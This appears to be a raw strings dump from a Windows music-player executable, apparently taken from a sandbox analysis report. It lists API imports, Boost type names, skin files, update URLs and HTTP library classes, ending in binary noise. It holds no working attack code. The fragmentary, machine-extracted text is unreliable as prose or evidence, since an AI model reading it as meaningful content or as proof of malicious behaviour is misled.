libfm::fm_impl::get_song_url
libfm::fm_impl::login
WinExec
KERNEL32.dll
GetAsyncKeyState
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
avcore.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
SHLWAPI.dll
gdiplus.dll
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@_W@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@_W@classic@spirit@boost@@U?$optional@V?$chset@_W@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@Ua_name@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$chlit@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spir
it@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_s@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$alternative@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$list_parser@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@U?$chlit@D@234@Uno_list_endtoken@234@Uplain_parser_category@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@234@@234@@23
4@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$alternative@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@V1234@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Uend_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@
%Program Files%\FM4.0\201409180317\fm4.exe
125x125.jpg
320x225.png
astop.png
back.png
bg2.png
bg3.png
bg_2.png
bk.png
bkcolor_1.png
bkcolor_2.png
bkcolor_3.png
bkcolor_4.png
bkcolor_5.png
bkcolor_6.png
bkcolor_7.png
border.png
btn-anonymity.png
btn-delete.png
btn-fav.png
btn-login.png
btn-login2.png
btn-next.png
btn-pause.png
btn-play.png
BtnHidePlayList.png
BtnRightTop.png
btn_9k.png
btn_bd.png
btn_close.png
btn_comm.png
btn_db.png
btn_fh.png
btn_kw.png
btn_ok.png
btn_ok_blue.png
btn_ok_red.png
btn_sc.png
btn_xm.png
button.png
channel.png
close.png
collection.png
color_list_bk.png
dash.png
DefaultUserImage.jpg
downd.png
downda.png
downdahover.png
DownLoadProgressForeImage.png
exit.png
fbcaptionbk.png
feedback.png
font_bkcolor.png
font_forecolor.png
forecolor_1.png
forecolor_2.png
forecolor_3.png
forecolor_4.png
forecolor_5.png
forecolor_6.png
forecolor_7.png
forgettt.jpg
frmdownmenu.xml
FrmDropDownMenuFrame.xml
FrmFeedBack.xml
FrmHotKeyTip.xml
frmlogin.xml
FrmLrcChild.xml
FrmMenuFrame.xml
frmplayer.xml
frmplaylist.xml
frmProgressToolTip.xml
frmWebBrowser.xml
frmWindowLrc.xml
frmWindowLrcParent.xml
headimg.png
history.png
home.png
hotkeytipbk.png
icon.png
input-password.png
input-user.png
like.png
list.png
lista.png
listahover.png
list_item_bg.png
list_pause.png
list_play.png
list_scroll_bar.png
list_scroll_bar2.png
list_title_bg.png
loading01.png
loading02.png
loading03.png
loading04.png
LoginBk.png
LrcBk.png
lrclist.png
lyricdelete.png
lyricdeletea.png
lyricdeletea2.png
LyricFrameVoice.png
lyricmute.png
lyrictoplay.png
mainframeshadow.png
max.png
menu.png
min.png
mine.png
minea.png
mineahover.png
mini.png
more.png
musiclibrary.png
next.png
next0520.png
normalVolume.png
play0520.png
play2.png
playerbg01.png
playerbg02.png
playerlist.png
playersidebg.jpg
playinging.jpg
playinginga.jpg
playingnext.png
playingplaying.jpg
playingprev.jpg
playingpreva.jpg
playingrandom.jpg
playingrandoma.jpg
playingvoice.png
PlayProgressForeImage.png
pl_back.png
pl_bg.png
pl_big.png
pl_btn_down.png
pl_btn_on.png
pl_close.png
pl_color.png
pl_desktop.png
pl_feedback.png
pl_forward.png
pl_icon.png
pl_itself.png
pl_mutevol.png
pl_next.png
pl_pause.png
pl_prev.png
pl_res.png
pl_set.png
pl_small.png
pl_split.png
pl_vol.png
pop_bkimage.png
power.png
prev.png
prev0520.png
prevention.png
progresstooltip.png
progresstooltipbk.png
progress_fore.png
pushedVolume.png
random.jpg
random01.jpg
random01a.jpg
random01hover.jpg
random02.jpg
random02a.jpg
random02hover.jpg
random03.jpg
random03a.jpg
random03hover.jpg
random0520.png
reflash.png
remembertt.jpg
scrollbar.png
search.png
SelectColor_SliderBar_Thumb.png
slider_bg.png
sound (2).jpg
sound.jpg
sound100.jpg
steup.png
suspensionbig.png
suspensionbiga.png
suspensionbigahover.png
suspensionclose.png
suspensionclosea.png
suspensioncloseahover.png
suspensionfeedback.png
suspensionfeedbacka.png
suspensionfeedbackahover.png
suspensionlogin.png
suspensionmin.png
suspensionmina.png
suspensionminahover.png
suspensionset.png
suspensionseta.png
suspensionsetahover.png
suspensiontop.png
suspensiontopa.png
suspensiontopahover.png
system_menu_btnexit.png
system_menu_btnfeedback.png
system_menu_btnmin.png
system_menu_btnmini.png
system_menu_btnsteup.png
system_menu_btntop.png
sys_check_btn.png
sys_check_btn_blue.png
sys_check_btn_red.png
sys_check_btn_whiter.png
tab_comm.png
tooltipbk.png
update.xml
voice00528.png
voice0520.png
voice0a0528.png
voice1000528.png
voiceall0528.png
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
mscoree.dll
LKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Skin\bkcolor_1.png
Skin\forecolor_1.png
Skin\bkcolor_2.png
Skin\forecolor_2.png
Skin\bkcolor_3.png
Skin\forecolor_3.png
Skin\bkcolor_4.png
Skin\forecolor_4.png
Skin\bkcolor_5.png
Skin\forecolor_5.png
Skin\bkcolor_6.png
Skin\forecolor_6.png
Skin\bkcolor_7.png
Skin\forecolor_7.png
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp
!p.empty() && "Empty path not allowed for put_child."
errorUrl
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp
val.is_initialized()
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp
c.stack.size() >= 1
Song.music_id
Song.artid
Song.name
Song.artist
Song.special
Song.artist_pic240
Song.mp3path
Song.mp3dl
hXXp://
=data.xcode
data.songList
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp
r.is_valid()
tplayList.trackList
Assertion failed: %s, file %s, line %d
1.14.814.2
MusicPla.exe
fm4svr.exe_1392:
.idata
.rdata
P.FSM0
`.rsrc
P.FSM1
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
OnKeyDown
OnKeyPress
OnKeyUp
UrlMon
Proportional
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeywordteA
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
AutoHotkeys8~D
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s, ClassID: %s
ole32.dll
olepro32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
TIdTCPConnection0
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile,}@
CertFile,}@
KeyFile
OnGetPasswordTGG
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTPx
TIdHTTPOnHeadersAvailable
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequestd
TIdHTTPProtocolx
TIdCustomHTTP
TIdCustomHTTPx
TIdHTTP`
TIdHTTP
HTTPOptionst
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserApph
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTopT
OnWindowSetWidth
OnWindowSetHeight
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath`
OnTranslateUrl
OnCommandExec
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
MAPI32.DLL
PTF://
hXXp://
hXXps://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Bypass
poPortrait
OnKeyDown<
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB hXXp://bsalsa.com/
TFileOperation
FileOperation
[(*&[^%$#]@!)]
OnActionExecute
SysConfig.ini
WJHTTP
%d.%d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0123456789
DSound.dll
Winmm.dll
Data\User2.ini
88888888
Update2.zip
Update3.zip
00000000
Update.zip
Update.Zip
Update2.Zip
Update3.Zip
FM4.exe
1.14.729.1
DMSet.Xml
/DM15/DMSet.Xml
hXXp://VVV.baidu.com
hXXp://update.yinyue.fm
8888-88-88
PlayerUpdate.exe
0000-00-00
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
?6)?6)?6)?6)?6)?6)?6)?6)<6)?6(?6)
@6,>6)?6)
?7*=5(>6)@7*@4(?5 ?5
>5(>5(>5(>5(>5(>5(>5(>5(>5(>5'=5(>5'>6)@5'
;2(;2(;2(;2(;2(;2(;2(;2(;2(;2(;2(92)
<3)?4&=4'=4'=4&
:1':1':1':1':1':1':1':1';1'<2(;2(7/(
93(;2%;3&;2(
mf]<3%>3%SLCng^
|sP@/O@0M@2O@0N?/peWO@0O@0O@0O@0O@0OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/PA.MA/zqc
ZM?OA.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2SC3RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2RB1SC2RB1RB1QA0RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2TD3TD3TD3TD3TD3TD3TD3TD3TD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4